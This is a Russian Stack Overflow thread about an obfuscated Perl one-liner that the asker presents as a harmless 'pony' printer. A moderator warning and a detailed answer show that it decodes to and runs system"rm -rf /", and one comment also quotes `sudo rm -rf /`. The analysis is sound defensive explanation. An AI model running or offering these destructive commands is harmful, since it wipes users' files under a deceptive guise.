# Что делает данный однострочник на Perl?

Tags: perl

> Дополнение от модератора: данный вопрос содержит код, который может
> привести к удалению всех файлов в вашей Линукс системе, не стоит
> бездумно пытаться запустить данный код.
>
> Подробнее см. [Rm -rf](http://wikireality.ru/wiki/Rm_-rf)

Что делает данный однострочник:

```
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
```

Comment: предлагаю удалить текст вопроса.

Comment: Я голосую за закрытие этого вопроса, потому что вопрос содержит вредоносный код в завуалированном виде.

Comment: Я просто хочу вывести красивого пони в терминале. Ничего вредоносного

Comment: пони выводятся по `apt moo`

Comment: @aleksandrbarakin, может просто в ответе разобрать почему код вредоносный? :-)

Comment: внизу уже разобрали

Comment: @KoVadim, я где-то видел именно по пунктам разбор, типа как эта строка преобразуется в аналог rm rf :)

Comment: что то модераторы не идут

Comment: кстати, ассоциация: https://stackoverflow.com/q/9591658/2881286

Comment: @Grundy, добавил разбор.

Comment: @aleksandrbarakin хоть это и троллинг, но вопрос правил не нарушает сам по себе. А хороший ответ только приветствуется.

Comment: И тебе `sudo rm -rf /` ! Долой! Мы не дураки...

Answer (score 43):

Эта программа удаляет все директории, в том числе и корневую `/`.

А если подробнее то:

`echo "test... test... test..."` выполнение этой команды не влияет на работу и добавлено, скорее всего, для усыпления бдительности. То, что происходит в остальном коде — совсем не очевидно из-за преднамеренно запутанного написания. В данной строчке записано всего три последовательно выполняемых команды. Запишем команду следующим образом:

```
$? ? s:;s:s;;$?: : s;;=]=>%-{<-|}<&|`{; ;
y; -/:-@[-`{-};`-{/" -; ;
s;;$_;see
```

Первая конструкция анализирует переменную `$?` — код возврата предыдущей команды. Так как перед выполнением этой конструкции дочерних процессов не создавалось, `$?` будет содержать `0`, и выполнена будет вторая «ветка» — `` s;;=]=>%-{<-|}<&|`{;. `` Эта команда, в свою очередь, заменяет строку в переменной-аккумуляторе `$_` на `=]=>%-{<-|}<&|`{ (первый символ после `s` устанавливает ограничитель параметров этого оператора, и хотя традиционно используются слэш `/` или `|`, для неясности в этой конструкции используется ограничитель `;`).

Вторая команда транслирует содержимое «аккумулятора» по достаточно сложным правилам. В левой части указано четыре диапазона символов, в правой — один. Если раскрыть эти диапазоны, получим следующее соответствие:

```
 !"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -
```

В результате содержимое `$_` принимает вид:

```
system"rm -rf /"
```

Третья же команда дважды (как инструктирует флаг ee) «вычисляет» содержимое аккумулятора — вышеуказанную деструктивную команду — и пытается заменить пустую строку в аккумуляторе на результат вычисления.

Comment: Знаем мы ваших пони.

Comment: Ты троянская пони, троянская пони! ✨

Comment: @andreymal [гениальный заголовок](https://ru.meta.stackoverflow.com/questions/10560/%d0%a2%d1%8b-%d1%82%d1%80%d0%be%d1%8f%d0%bd%d1%81%d0%ba%d0%b0%d1%8f-%d0%bf%d0%be%d0%bd%d0%b8-%d1%82%d1%80%d0%be%d1%8f%d0%bd%d1%81%d0%ba%d0%b0%d1%8f-%d0%bf%d0%be%d0%bd%d0%b8)